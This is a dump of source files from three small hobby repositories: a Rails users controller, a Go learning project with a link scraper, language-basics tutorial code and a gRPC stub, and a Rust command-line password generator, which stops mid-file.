] | 3 | Python | logaprakash/Ranking-MRF | f255d5c52652420e4fc04f484b305163b15ce1f5 | 3f073b4a2f9ed0e488ed8dce3d1b777a8ac56ed3 |
refs/heads/master | <repo_name>Bakalavr113/sample<file_sep>/app/controllers/users_controller.rb
class UsersController < ApplicationController
def new
@user = User.new
end
def create
@user=User.new(users_params)
if @user.save
redirect_to_root_path
end
end
def login
@user=User.new
end
def result
@user=User.find_by(email:params[:user][:email], password: params[:user][:password])
redirect_to user_path(@user.id)
end
def show
@user = User.find(params[:id])
end
def edit
@user = User.find(params[:id])
end
def update
@user = User.find(params[:id])
@user.update(users_params)
if @user.save
redirect_to user_path(@user.id)
end
end
def destroy
User.find(params[:id]).destroy
flash[:success] = "User deleted"
redirect_to root_path
end
private
def users_params
params.require(:user).permit(:firstname, :lastname, :email, :password)
end
end
| f925133774e6b6ba194cefc423cb213a28ea3a24 | [
"Ruby"
] | 1 | Ruby | Bakalavr113/sample | 7086e3c815460d567dee12b55b96ac1f42ce3145 | 98b1727ae8e73b1134ac672da0a1caaf888d7a93 |
refs/heads/master | <file_sep>package main
//
//
// Go web scraper
// 0.0.1
//
//
// Usage: go run scraper.go
// curl -s 127.0.0.1:7171/search?url=<URL>
import (
"encoding/json"
"log"
"net/http"
"time"
"github.com/gocolly/colly"
)
var startTime time.Time
func ping(w http.ResponseWriter, r *http.Request) {
log.Println("Ping")
w.Write([]byte("ping"))
}
func scraper() {
addr := ":7171"
// Endpoints
http.HandleFunc("/ping", ping)
http.HandleFunc("/search", getData)
log.Println("listening on", addr)
log.Fatal(http.ListenAndServe(addr, nil))
}
func getData(w http.ResponseWriter, r *http.Request) {
startTime = time.Now()
// Verify that the URL param exists
URL := r.URL.Query().Get("url")
if URL == "" {
log.Println("Missing URL..")
return
}
log.Println("visiting", URL)
// Create a collector that will handle the data collection from HTML
c := colly.NewCollector()
var response []string
// OnHTML function allows using a callback function
// when a certain HTML-tag i reached, call the anonymous
// function, and add the info to the slice 'response'
c.OnHTML("a[href]", func(e *colly.HTMLElement) {
link := e.Request.AbsoluteURL(e.Attr("href"))
if link != "" {
response = append(response, link)
}
})
// Visit URL
c.Visit(URL)
// Response slice to JSON
b, err := json.Marshal(response)
if err != nil {
log.Println("failed to serialize response:", err)
return
}
// Add a header and write the body to the endpoint
w.Header().Add("Content-Type", "application/json")
w.Write(b)
t := time.Now()
elapsed := t.Sub(startTime)
log.Printf("Scraped in %v", elapsed)
}
<file_sep>package basics
import (
"fmt"
"strings"
"sync"
)
type Person struct {
Name string
Age int
}
func (k Person) Print() {
fmt.Println("\n", k)
}
// Capital P is syntax, not style, and needed to make the function exported (public)
func PrintPerson(name string, age int) {
person := Person{
name,
age,
}
person.Print()
}
// SOURCE: <NAME> - Golang in under an hour (2021) https://www.youtube.com/watch?v=N0fIANJkwic
// LOOPS
// REGULAR FOR LOOP
func ForLoop() {
var sum int
fmt.Println(sum)
for i := 0; i < 5; i++ {
sum++
fmt.Println(sum)
}
infiniteForLoop()
}
// INFINITE FOR LOOP
func infiniteForLoop() {
fmt.Println("Infinite for loop (with break): ")
sum := 0
fmt.Printf("Sum: %v", sum)
for {
sum++ // Goes on forever
fmt.Printf("Sum: %v", sum)
if sum == 10 {
fmt.Println("Break!")
break // Breaks at 10
}
}
whileLoop()
}
// WHILE LOOP
func whileLoop() {
// Go does not have while loops, instead you use for loop
fmt.Println("This is a 'while' loop: n = 0")
n := 0
for n < 5 {
n++
fmt.Printf("'While' loop n = %v", n)
}
arrayInt()
}
// Arrays
func arrayInt() {
var a [5]int // This will be 0, 0, 0, 0, 0
b := [5]int{10, 20, 30, 40, 50}
b[1] = 25
fmt.Println("a", a)
sliceInt()
}
// Slices are dynamically sized arrays - like C# lists
func sliceInt() {
// Slices seems to be similar to lists in C#
var c []int // An array without defined size is a slice
fmt.Println("c empty: ", c)
c = []int{10, 20, 30, 40}
fmt.Println("c not empty: ", c)
// Slices can also be short-hand initialized
d := []int{10, 20, 30, 40, 50}
fmt.Println("d: ", d)
// Slices can also be initialized like this:
s := make([]int, 4)
// Append takes one slice as an argument, and the elements
s = append(s, 60, 70)
fmt.Println("s: ", s)
// Manipulate the slice
// This makes the index 2 (third element) in the slice equal to
// the index in s where the element at the index of the length of the slice
// (last element + 1(out of bounds)) - 1. Which is the last element.
s[2] = s[len(s)-1]
fmt.Println("s(3-5)", s[2:5]) // Print the 3rd to the 6th element
// Range
// Iterate through s
// k is key, v is value
// key is index
// printing each key in each value
for k, v := range s {
fmt.Printf("%d is %d\n", k, v)
}
mapExample()
}
// MAPS
// Seems to be similar to dicts in C#
var sampleMap map[string]int
func mapExample() {
sampleMap = map[string]int{
"Bob": 30,
"Kevin": 24,
}
// Adding to the map
sampleMap["Another person"] = 42
currency := map[string]string{
"NOK": "Norwegian Krone",
"EUR": "Euro",
"USD": "USA Dolar",
}
currency["GBP"] = "Great Britain Pound"
fmt.Println("Currency GBP added to the map: ", currency)
// Remove from the map
delete(currency, "GBP")
fmt.Println("Currency GBP deleted from the map: ", currency)
// Replacing a value in the map
currency["EUR"] = "Norwegian Krone"
fmt.Println("Currency with EUR value replaced with NOK: ", currency)
// Iterating through a range in the map
for key, value := range currency {
fmt.Printf("%v might be equal to: %v\n", key, value)
}
// Iterating through only keys
for key := range currency {
fmt.Printf("%v is a currency in the map", key)
}
testStructs()
}
// STRUCTS
// basically like a class in C# or other languages
type anotherPerson struct {
firstName string `json:"firstName" yaml:"firstName"` // Tagging can be added for serialization
lastName string
age int
}
type animal struct {
name string
characteristics []string
}
func testStructs() {
p1 := anotherPerson{
firstName: "Goofy",
lastName: "",
age: 0,
}
fmt.Println("A person struct: ", p1)
animal1 := animal{
name: "Lion",
characteristics: []string{
"Eats humans",
"Wild animal",
"Carnivore",
},
}
// Use dot(.) to access each field in the struct
fmt.Println("Animal name: ", animal1.name)
// Iterate through all the values in a collection
for _, v := range animal1.characteristics {
fmt.Printf("\t %v\n", v) // \t is regular expression for TAB: https://www.rexegg.com/regex-quickstart.html
}
// Promotion ...
type herbivore struct {
animal animal
eatHuman bool
}
// ... A struct within a struct
herbi := herbivore{
animal: animal{
name: "Goat",
characteristics: []string{
"Lacks sense",
"Eats grass",
},
},
eatHuman: false,
}
fmt.Println("\nThis animal:")
fmt.Println("Eats human? ", herbi.eatHuman) // False
// Anonymous struct
bio := struct {
firstName string
friends map[string]int
favDrinks []string
}{
firstName: "Steven",
friends: map[string]int{
"Tim": 12345678,
"Adbul": 23456789,
},
favDrinks: []string{
"Pepsi Max",
"Tea",
},
}
fmt.Println("Bio: ", bio.firstName)
// Iterating through all the keys and values in a map of an anonymous struct
for k, v := range bio.friends {
fmt.Println(k, v)
}
// Iterating through all the keys and values in a slice of an anonymous struct
for k, v := range bio.favDrinks {
fmt.Println(k, v)
}
callFunctions()
}
// FUNCTIONS
// Functions can be values, since Go in itself is functional
func callFunctions() {
defer LastHi() // Defer postpones a function to run last
defer func() { // The defers works like a stack, and will be reversed in order...
// ... adding LastHi() first, and then this one on top, executing this one before LastHi()
fmt.Println("Almost last hi")
}()
a := Hello()
fmt.Println(a) // Hello, there
// Initializing both values short-hand
b, c := TwoValues()
fmt.Println(b, c) // Hello world
// Functions as values
d := TwoValues
fmt.Println(d()) // Hello world
testReceivers()
}
// Function functionName() return type { ... }
func Hello() string {
return "Hello, there"
}
func TwoValues() (string, string) {
return "Hello", "world"
}
// public void FunctionName()
func LastHi() {
fmt.Println("Last HI!")
}
// RECEIVERS
// Calling a function using standard parameters will make a copy, and return the copy value.
// To mutate our values, we need to pass it along with a reference (e *Employee)
type Employee struct {
FirstName, LastName string
}
// Standard way of sending in information to a function and specifying the return type
// function functionName(param1 type, param2 type) (returnValue returnType)
func fullName(firstName string, lastName string) (fullName string) {
fullName = firstName + lastName
return fullName
}
func testReceivers() {
e := Employee{
FirstName: "X Æ A-12",
LastName: "Musk",
}
fmt.Println("Son's name was", fullName(e.FirstName, e.LastName))
e.changeFirstName("X Æ A-Xii")
fmt.Println("Son's name is now", fullName(e.FirstName, e.LastName))
fmt.Println("Son's name is now", e)
testInterfaces()
}
// For quicker access to fields
func (e Employee) fullName() string {
return e.FirstName + " " + e.LastName // More string concatination too!
}
// For modifying the internals of the struct
// I suppose this is valid:
// func (ref/ref value) funcName(p pType) (r rType, r2 rType2)
// Which makes the function a function for the struct only with params and return values
func (e *Employee) changeFirstName(firstName string) {
e.FirstName = firstName
}
// INTERFACES
// Implementation of interfaces is implicit, rather than explicit like for C#
// Interfaces are very popular in Go
type Shape interface {
Area() float64
Perimeter() float64
}
type Rect struct {
width float64 // The struct implements Shape implicit
height float64 // The struct implements Shape implicit
}
func (r Rect) Area() float64 {
return r.width * r.height
}
func (r Rect) Perimeter() float64 {
return 2 * (r.width * r.height)
}
var s Shape
func testInterfaces() {
s = Rect{width: 5.0, height: 4.0}
r := Rect{5.0, 4.0} // We don't have to use names, just send the calues in the order of the interface
fmt.Printf("Type of s is %T\n", s)
fmt.Printf("value of s is %v\n", s)
fmt.Println("area of rectangle s", s.Area())
fmt.Println("s == r is", s == r)
printArea(r)
testStrings()
}
func printArea(s Shape) {
fmt.Printf("Area of shape is: %v", s.Area())
}
// TYPE CHECKING/CONVERSION
// Everything is a type, also interfaces
func testStrings() {
explain("Hello world")
explain(52)
explain(true)
explain2("Hello world 2")
testPointers()
}
// We can infer types at runtime
func explain(i interface{}) { // Using empty interface to infer the type of i and then checking it in the switch
fmt.Println("Type checking with interface i as parameter: ")
switch i.(type) {
case string:
fmt.Println("i stored string ", strings.ToUpper(i.(string))) // Need to cast
case int:
fmt.Println("i stored int", i)
default:
fmt.Println("i stored something else", i)
}
}
func explain2(i interface{}) {
// Shorter
switch i := i.(type) { // Assigning i.(type) to a variable declares the type of that variable beforehand
case string:
fmt.Println("i stored string ", strings.ToUpper(i)) // No need to cast
case int:
fmt.Println("i stored int", i)
default:
fmt.Println("i stored something else", i)
}
}
// POINTERS
type OriginalType struct {
firstName string
lastName string
}
func changeNameVal(ot OriginalType) {
ot.firstName = "Unchanged" // This will not change the original struct, just make a copy and return the new value
}
func changeOriginalName(ot *OriginalType) {
ot.firstName = "Karl"
}
func changeSecondItemVal(arr [5]int) {
arr[1] = 1
}
func changeSecondItem(arr *[5]int) {
arr[1] = 1
}
func changeSecondItemSlice(arr []int) {
arr[1] = 1
}
// "main"
func testPointers() {
fmt.Println("Testing pointers")
originalType := OriginalType{
firstName: "Ola",
lastName: "Nordmann",
}
changeNameVal(originalType) // Do not change the original struct, only returns a copy
fmt.Println("Did not change", originalType)
changeOriginalName(&originalType) // Needs a receiver of the original (&) using memory address
fmt.Println("Did change", originalType)
// Arrays is sent by value, slices are sent by reference by default
// Slices, maps and channels are sent by reference by default - no need to create reference
var a = [5]int{} // Array
changeSecondItemVal(a)
fmt.Println("Did not change the original: ", a) // Unchanged ([0, 0, 0, 0, 0])
changeSecondItem(&a)
fmt.Println("Changed!", a) // This will change as it has a receiver ([0, 1, 0, 0, 0])
var b = []int{0, 0, 0, 0}
changeSecondItemSlice(b)
fmt.Println("Changed clice by val..?", b) // Changed, even though we sent by value, not reference ([0, 1, 0, 0, 0])
fmt.Println("b changed because it's a slice, and slices, maps, and channels are always sent by reference, not copy-value. Arrays sends by value")
testGoroutines()
}
// GOROUTINES AND CHANNELS
// Goroutines are functions declared with go functionName()
// The for loops will all start a new goroutine in the background, running them separately,
// not returning 0123456789, but still correct behavior
func printHi() {
fmt.Println("Hi")
}
func testGoroutines() {
fmt.Println("Testing Goroutines: \"Hi\" is a return value of a goroutine 'printHi()'")
go printHi()
fmt.Println("Hi2")
// Hi will sometimes not be printed...
var wg sync.WaitGroup
wg.Add(10)
// This returns weird results
// because it uses the i in the for loop as a copy
for i := 0; i < 10; i++ {
go func() {
fmt.Print(i) // 101010101033101010
wg.Done()
}() // returnvalue
}
wg.Wait()
// Testing again
wg.Add(10)
for i := 0; i < 10; i++ {
go func(i int) {
fmt.Print(i) //7126403985 all numbers from 0-9 printed
wg.Done()
}(i) // returnvalue
}
wg.Wait()
wg.Add(10)
for i := 0; i < 10; i++ {
go printNum(i, &wg) // 4207186395
}
wg.Wait()
//
fmt.Println("Always pass in a parameter in the goroutine")
testChannels()
}
func printNum(i int, wg *sync.WaitGroup) { // Passing in the waitgroup by reference
fmt.Print(i)
wg.Done()
}
// CHANNELS
// Allows putting data inside the channels and pull data out of those channels in a thread safe way
// Good for passing information in and out of goroutines
// Channel operator: <-
// The data flows in the direction of the arrow
func testChannels() {
fmt.Println("Testing channels")
simple()
}
func simple() {
somechan := make(chan int) // Making a new channel with the make keyword, of type int
go func() { somechan <- 1 }() // Creating a goroutine that is going to read from the channel
a := <-somechan // From the outside we can create a variable that reads from the channel
fmt.Println(a) // And then print it
blocking()
}
// Channels are blocking
// Channels can't hold data, so I need to get the data from the channel before the application can continue
// We need a goroutine in the background getting the value from a channel immediately after I put something in the channel
// Channels are also used for blocking and syncing the flow
func blocking() {
someChan := make(chan bool)
// someChan <- true - this will be blocked
// <-someChan - as well as this
go func() { // If we removed this function, we could not read anything in the print
someChan <- true // because nothing is trying to write to the channel
}() // this would cause a deadlock, resulting in an error, since the application would never finish
fmt.Println(<-someChan) // Code will start executing from here once func blocking() is called,
// the goroutine will be running, putting a value into the channel,
// making us able to print the value.
// Else, the execution would wait until the channel had a value
buffered()
}
// Buffered channels are able to hold value
func buffered() {
someChan := make(chan bool, 1) // Declaring a channel with one slot, meaning it can hold a single value
someChan <- true // No block, the channel can hold one value
fmt.Println(<-someChan)
brokenFor()
}
func brokenFor() {
someChan := make(chan int)
go func() {
// Infinite loop in the background
for {
fmt.Println(<-someChan)
}
}() // void
someChan <- 1 // 1
someChan <- 2 // 2
someChan <- 3 //
// 3 will not be printed, because after assigning 3 to the channel, the program exits
chanRange()
}
// Q: Why can you assign 3 values to a channel here and print all the values? Can a channel hold multiple values if they're closed?
// how do the channel know that it's being closed ahead of time? Shouldn't value 1 and 2 be discarded?
// No wait, the goroutine will assign 1 to the channel, then it will block. The for loop will read channel value 1, and get blocked
// the goroutine will assign 2, and so on. I think.
func chanRange() {
someChan := make(chan int)
go func() {
someChan <- 1 // 1
someChan <- 2 // 2
someChan <- 3 // 3
close(someChan) // This will work
}()
for val := range someChan { // This will read from the channel as it's being assigned to
fmt.Println(val)
}
closingChan()
}
func closingChan() {
// Closing a channel
someChan := make(chan int)
close(someChan)
// Writing to a close chan will be panic, crash the program and exit
// someChan <- 3
// Reading from a closed channel will always succeed
// first will be zero-value
// second will be bool indicating if the channel is open
val, b := <-someChan
fmt.Printf("Val is: %v, is open: %v\n", val, b) //0, false
// Range will read from the channel until _, bool returns false
// Rule of thumb:
// ONLY THE CREATOR OF A CHANNEL, CLOSES THE CHANNEL
broadcastChan()
}
func broadcastChan() {
var wg sync.WaitGroup
ch := make(chan int)
wg.Add(2) // Adding two waitgroups to wg WaitGroup
go func(c <-chan int) { // Creating a goroutine with channel c of type int
for i := range c { // Ranging in c until _, bool == false
fmt.Println("1st goroutine: ", i) // This is the first goroutine, reading from channel ch
}
// Next line happens only if c is closed
wg.Done()
}(ch)
go func(c <-chan int) { // Creating a goroutine with channel c of type int
for i := range c { // Ranging in c until _, bool == false
fmt.Println("1st goroutine: ", i) // This is the second goroutine reading from the same channel as the first goroutine
}
// Next line happens only if c is closed
wg.Done()
}(ch)
for i := 0; i < 10; i++ {
ch <- 1
}
close(ch) // Both goroutines will run until this one exits the main goroutine
}
<file_sep>package main
import (
"fmt"
"log"
"net"
//chat "github.com/pynezz/chat"
chat "github.com/pynezz/hello-go/chat"
hello "github.com/pynezz/hello-go/hello_world"
basics "github.com/pynezz/hello-go/the_basics"
"google.golang.org/grpc"
)
var age int
var name string = "Kevin"
func main() {
// runPackageHello_Go()
// printFromBasics(name, 24)
message, err := hello.RandomGreeting(name)
if err != nil {
log.Fatal(err)
}
fmt.Println(message)
fmt.Println(("Starting gRPC server..."))
startServer()
//scraper()
}
func startServer() {
lis, err := net.Listen("tcp", ":9000")
if err != nil {
log.Fatalf("Failed to listen on port 9000: %v", err)
}
s := chat.UnimplementedChatServiceServer{}
grpcServer := grpc.NewServer()
chat.RegisterChatServiceServer(grpcServer, &s)
if err := grpcServer.Serve(lis); err != nil {
log.Fatalf("Failed to serve gRPC server over port 9000: %v", err)
}
fmt.Println("Server started")
}
func printFromBasics(name string, age int) {
basics.PrintPerson(name, age)
}
func printString() {
age = 24
fmt.Printf("\nMy age: %d \n", age)
added := addTwoInts(2, 2)
fmt.Printf("2 + 2 = %v", added)
}
func addTwoInts(i int, j int) int {
add := func(i int, j int) int {
k := i + j
return k
}
return add(i, j)
}
func runPackageHello_Go() {
h := hello.Hello{
Hello: "Hey",
}
h.Hello_Go()
printString()
}
// Notes:
<file_sep>package hello
import (
"errors"
"fmt"
"math/rand"
"time"
)
type Hello struct {
Hello string
}
func (h Hello) Hello_Go() {
fmt.Printf("%s, Go!", h.Hello)
}
func RandomGreeting(name string) (string, error) {
if name == "" {
return name, errors.New("empty name")
}
// Random format message
message := fmt.Sprintf(randomFormat(), name)
return message, nil
}
func init() {
rand.Seed(time.Now().UnixNano())
}
func randomFormat() string {
// A slice of message formats
formats := []string{
"Hello, %v. Welcome!",
"Great to see you, %v!",
"How you doin %v",
}
return formats[rand.Intn(len(formats))]
}
<file_sep>package main
/*
CREDIT: TutorialEdge [Beginners Guide to gRPC in Go!] - https://www.youtube.com/watch?v=BdzYdN_Zd9Q
*/
import (
"log"
"net"
chat "github.com/pynezz/hello-go/chat"
"google.golang.org/grpc"
)
func StartServer() {
lis, err := net.Listen("tcp", ":9000")
if err != nil {
log.Fatalf("Failed to listen on port 9000: %v", err)
}
s := chat.UnimplementedChatServiceServer{}
grpcServer := grpc.NewServer()
chat.RegisterChatServiceServer(grpcServer, &s)
if err := grpcServer.Serve(lis); err != nil {
log.Fatalf("Failed to serve gRPC server over port 9000: %v", err)
}
}
<file_sep># hello-go
<a href="https://golang.org">
<img src="https://blog.golang.org/go-brand/Go-Logo/SVG/Go-Logo_Blue.svg" alt="golang.org" height="100">
</a>
###### Go 1.16.3
## This is a repository where I explore [Go](https://golang.org)!
### Syntax
- PascalCase is for exported (public) functions, and camelCase for private. ([Documentation](https://golang.org/ref/spec#Exported_identifiers))
- := declares a new inferred type
- type declaration is reversed as from C#
- No need for parentheses in if statements
- No need for semicolon at end of variables etc. unless it's
Go functions:
```golang
func function(i int) {
// code goes here
}
```
C# methods:
```csharp
void Method(int i)
{
// code goes here
}
```
### Sources
#### Go - golang.org
- [Getting Started - *docs*](https://golang.org/doc/tutorial/getting-started)
- [Create Module - *docs*](https://golang.org/doc/tutorial/create-module)
- [Random Greeting - *docs*](https://golang.org/doc/tutorial/random-greeting)
- [Package fmt - *pkg/fmt*](https://golang.org/pkg/fmt/#Printf)
- [Effective Go - *docs*](https://golang.org/doc/effective_go)
---
#### Go - other sources
- [The blank identifier in Golang - golangdocs.com](https://golangdocs.com/blank-identifier-in-golang)
- [How to build a web scraper using golang with colly - dev.to/vianeltxt](https://dev.to/vianeltxt/how-to-build-a-web-scraper-using-golang-with-colly-18lh)
- [go-colly.org](http://go-colly.org/)
##### Github
- [Awesome Go](https://github.com/avelino/awesome-go)
-----
#### Markdown
- [markdownguide.org](https://www.markdownguide.org/)
#### misc
First google result on term 'go semicolon' yielded possibly one of the earliest questions about Go on stackoverflow, datet 2 days after first official announcement (November 12th, 2009)
- [StackOverflow outdated question about semicolon placement](https://stackoverflow.com/questions/1719999/why-do-i-need-a-semicolon-here)
- [This is what I was looking for - *golang.org | docs/effective_go#semicolons](https://golang.org/doc/effective_go#semicolons)
#### gRPC
- [Protocol Buffer install - grpc.io](https://grpc.io/docs/protoc-installation/)
- [Go quick start - grpc.io](https://grpc.io/docs/languages/go/quickstart/) | 1b72fa86a4de9dfd836e59ec7e2bfb5c3499f865 | [
"Markdown",
"Go"
] | 6 | Go | pynezz/hello-go | 179ab923c6956756762bf6cd159af237b6153a8f | 12ec123097be987bb9b16acdc18911789fe67c65 |
refs/heads/main | <repo_name>xgillard/passg<file_sep>/passg-lib/src/lib.rs
//! This library provides a convenient way to generate pseudorandom passwords
//! according to some given constraints.
//!
//! # Example
//! ```
//! use passg::prelude::*;
//! let generator = GeneratorBuilder::default().build();
//! let password = generator.generate();
//! ```
pub mod charsets;
pub mod errors;
pub mod generator;
/// A prelude you can use to easily get started
pub mod prelude {
pub use super::charsets::{Alpha, CollatingSeq, Digit, Special};
pub use super::errors::Error;
pub use super::generator::{Generator, GeneratorBuilder};
}
<file_sep>/passg-lib/src/errors.rs
//! This module defines the error that might occur while using passg.
/// These are the errors that can occur while generating a password
#[derive(Debug, Clone, PartialEq, Eq, Hash, thiserror::Error)]
pub enum Error {
#[error("could not parse")]
ParseError(String),
}
<file_sep>/passg-lib/src/generator.rs
//! This module defines the type used to configure and generate passwords
use derive_builder::Builder;
use rand::Rng;
use crate::charsets::{Alpha, CollatingSeq, Digit, Special};
/// This is the structure you'll use to generate a random password
#[derive(Debug, Builder)]
pub struct Generator {
#[builder(default = "20")]
length: usize,
#[builder(default = "Alpha::Dist")]
alpha: Alpha,
#[builder(default = "Digit::Dist")]
digit: Digit,
#[builder(default = "Special::Basic")]
special: Special,
}
impl Default for Generator {
fn default() -> Self {
Generator {
length: 20,
alpha: Alpha::Dist,
digit: Digit::Dist,
special: Special::Basic,
}
}
}
impl Generator {
/// Generates a new random password as per specified configuration
pub fn generate(&self) -> String {
let charset = self.charset();
let mut out = String::new();
for _ in 0..self.length {
let idx = rand::thread_rng().gen_range(0..charset.len());
out.push(charset[idx]);
}
out
}
/// Returns a vector comprising only those characters that can be used to
/// generate a new password
fn charset(&self) -> Vec<char> {
let mut chars = vec![];
self.alpha
.characters()
.iter()
.copied()
.for_each(|c| chars.push(c));
self.digit
.characters()
.iter()
.copied()
.for_each(|c| chars.push(c));
self.special
.characters()
.iter()
.copied()
.for_each(|c| chars.push(c));
chars
}
}
<file_sep>/passg-tool/Cargo.toml
[package]
edition = "2018"
name = "passg-tool"
version = "0.1.0"
description = "Generate pseudo-random passwords from the command line"
license = "MIT"
readme = "README.md"
repository = "https://github.com/xgillard/passg"
categories = ["command-line-utilities", "authentication"]
keywords = ["password"]
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
passg-lib = {version = "0.1.0", path = "../passg-lib"}
structopt = "0.3.23"
<file_sep>/passg-tool/src/main.rs
use passg_lib::prelude::*;
use structopt::StructOpt;
/// PassGen is a tool that lets you generate pseudo-random passwords from
/// the command line.
#[derive(Debug, StructOpt)]
struct Args {
/// The length of the password
#[structopt(short, long, default_value = "20")]
length: usize,
/// What kind of alphabetic characters do you want to allow ?
/// (all = 'all', none = 'none', easily distinguished = 'dist' [eg removes O vs 0],
/// lower case = 'lower', upper case = 'upper')
#[structopt(short, long, default_value = "dist")]
alpha: Alpha,
/// What kind of numeric characters do you want to allow ?
/// (all = 'all', none = 'none', easily distinguished = 'dist' [eg removes O vs 0])
#[structopt(short, long, default_value = "dist")]
digit: Digit,
/// What kind of special characters do you want to allow ?
/// (all = 'all', none = 'none', the most common ones = 'basic')
#[structopt(short, long, default_value = "basic")]
special: Special,
}
impl From<Args> for Generator {
fn from(args: Args) -> Generator {
GeneratorBuilder::default()
.length(args.length)
.alpha(args.alpha)
.digit(args.digit)
.special(args.special)
.build()
.expect("Could not build a password generator") // will not occur
}
}
fn main() {
let generator = Generator::from(Args::from_args());
println!("{}", generator.generate());
}
<file_sep>/README.md
# PassGen
PassGen is a simple command line tool to generate pseudo-random passwords
matching a desired set of (simple constraints)
## Usage (as a library)
The crate's documentation gives an example on how to generate a random password.
Basically, you will want to do something along these lines:
```rust
use passg::prelude::*;
let generator = GeneratorBuilder::default()
.alpha(Alpha::Dist) // this is the default
.digit(Digit::Dist) // this is the default
.special(Special::Basic) // this is the default
.build()
.expect("This is never going to fail")
```
## Usage (as a tool)
```
passg 0.2.0
PassGen is a tool that lets you generate pseudo-random passwords from the command line
USAGE:
passg [OPTIONS]
FLAGS:
-h, --help Prints help information
-V, --version Prints version information
OPTIONS:
-a, --alpha <alpha> What kind of alphabetic characters do you want to allow ? (all = 'all', none = 'none',
easily distinguished = 'dist' [eg removes O vs 0], lower case = 'lower', upper case =
'upper') [default: dist]
-d, --digit <digit> What kind of numeric characters do you want to allow ? (all = 'all', none = 'none',
easily distinguished = 'dist' [eg removes O vs 0]) [default: dist]
-l, --length <length> The length of the password [default: 20]
-s, --special <special> What kind of special characters do you want to allow ? (all = 'all', none = 'none', the
most common ones = 'basic') [default: basic]
```
<file_sep>/passg-lib/README.md
# PassG-lib
PassGen is a simple crate to help you to pseudo-random passwords
matching a desired set of (simple constraints)
## Usage
The crate's documentation gives an example on how to generate a random password.
Basically, you will want to do something along these lines:
```rust
use passg::prelude::*;
let generator = GeneratorBuilder::default()
.alpha(Alpha::Dist) // this is the default
.digit(Digit::Dist) // this is the default
.special(Special::Basic) // this is the default
.build()
.expect("This is never going to fail")
```<file_sep>/Cargo.toml
[workspace]
members = [
'passg-lib',
'passg-tool',
]
<file_sep>/passg-lib/Cargo.toml
[package]
edition = "2018"
name = "passg-lib"
version = "0.1.0"
description = "Generate pseudo-random passwords"
license = "MIT"
readme = "README.md"
repository = "https://github.com/xgillard/passg"
categories = ["authentication"]
keywords = ["password"]
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
derive_builder = "0.10.2"
rand = "0.8.4"
structopt = "0.3.23"
thiserror = "1.0.28"
<file_sep>/passg-lib/src/charsets.rs
//! This module configures the collating sequences (aka charsets) that are
//! available for generating a pseudo-random password.
use std::str::FromStr;
use crate::errors::Error;
// -----------------------------------------------------------------------------
// GLOBAL CONSTANTS
// -----------------------------------------------------------------------------
/// The empty charset
static NONE: [char; 0] = [];
/// The lowercase alphabetic
static ALPHA_LOWER: [char; 26] = [
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z',
];
/// The upper case alphabetic
static ALPHA_UPPER: [char; 26] = [
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
];
/// All alphabetic characters
static ALPHA_ALL: [char; 52] = [
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
];
/// Only easily distinguished characters
static ALPHA_DIST: [char; 49] = [
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
];
/// All digits
static DIGIT_ALL: [char; 10] = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'];
/// Only the digits that are easily distinguished
static DIGIT_DIST: [char; 7] = ['3', '4', '5', '6', '7', '8', '9'];
/// *All* (actually, a small subset) the special characters
static SPECIAL_ALL: [char; 29] = [
'#', '@', '&', '"', '\'', '(', '§', '!', ')', '-', '_', '¨', '^', '*', '$', '€', '%', '£', '`',
'<', '>', '?', ',', '.', ';', ':', '/', '+', '=',
];
/// Only the most common (easiest to distinguish) special characters
static SPECIAL_BASIC: [char; 19] = [
'#', '@', '&', '(', '!', ')', '-', '_', '*', '$', '%', '?', ',', '.', ';', ':', '/', '+', '=',
];
// -----------------------------------------------------------------------------
// THE VARIOUS DEFINED CHARSETS
// -----------------------------------------------------------------------------
/// A collating sequence
pub trait CollatingSeq {
/// return all characters from the charset
fn characters(&self) -> &[char];
}
/// Sets related to the alphabetic collating sequence
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum Alpha {
/// Both lower and upper case letters ("*", "b", "both")
All,
/// Characters that are easily distinguished (O,l,Z).
Dist,
/// Lower case letters only ("l", "lc", "lower" or "lower-case")
Lower,
/// Upper case letters only ("u", "uc", "upper" or "upper-case")
Upper,
/// No letters
None,
}
impl FromStr for Alpha {
type Err = Error;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s.to_lowercase().as_str() {
"*" => Ok(Self::All),
"a" => Ok(Self::All),
"all" => Ok(Self::All),
"any" => Ok(Self::All),
"d" => Ok(Self::Dist),
"e" => Ok(Self::Dist),
"easy" => Ok(Self::Dist),
"dist" => Ok(Self::Dist),
"l" => Ok(Self::Lower),
"lc" => Ok(Self::Lower),
"lower" => Ok(Self::Lower),
"lower-case" => Ok(Self::Lower),
"u" => Ok(Self::Upper),
"uc" => Ok(Self::Upper),
"upper" => Ok(Self::Upper),
"upper-case" => Ok(Self::Upper),
"0" => Ok(Self::None),
"n" => Ok(Self::None),
"none" => Ok(Self::None),
_ => Err(Error::ParseError(s.to_string())),
}
}
}
/// Sets related to the numeric collating sequence
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum Digit {
/// All digits
All,
/// Characters that are easily distinguished (excludes 0 and 1, 2).
Dist,
/// No digits
None,
}
impl FromStr for Digit {
type Err = Error;
fn from_str(s: &str) -> Result<Self, Self::Err> {
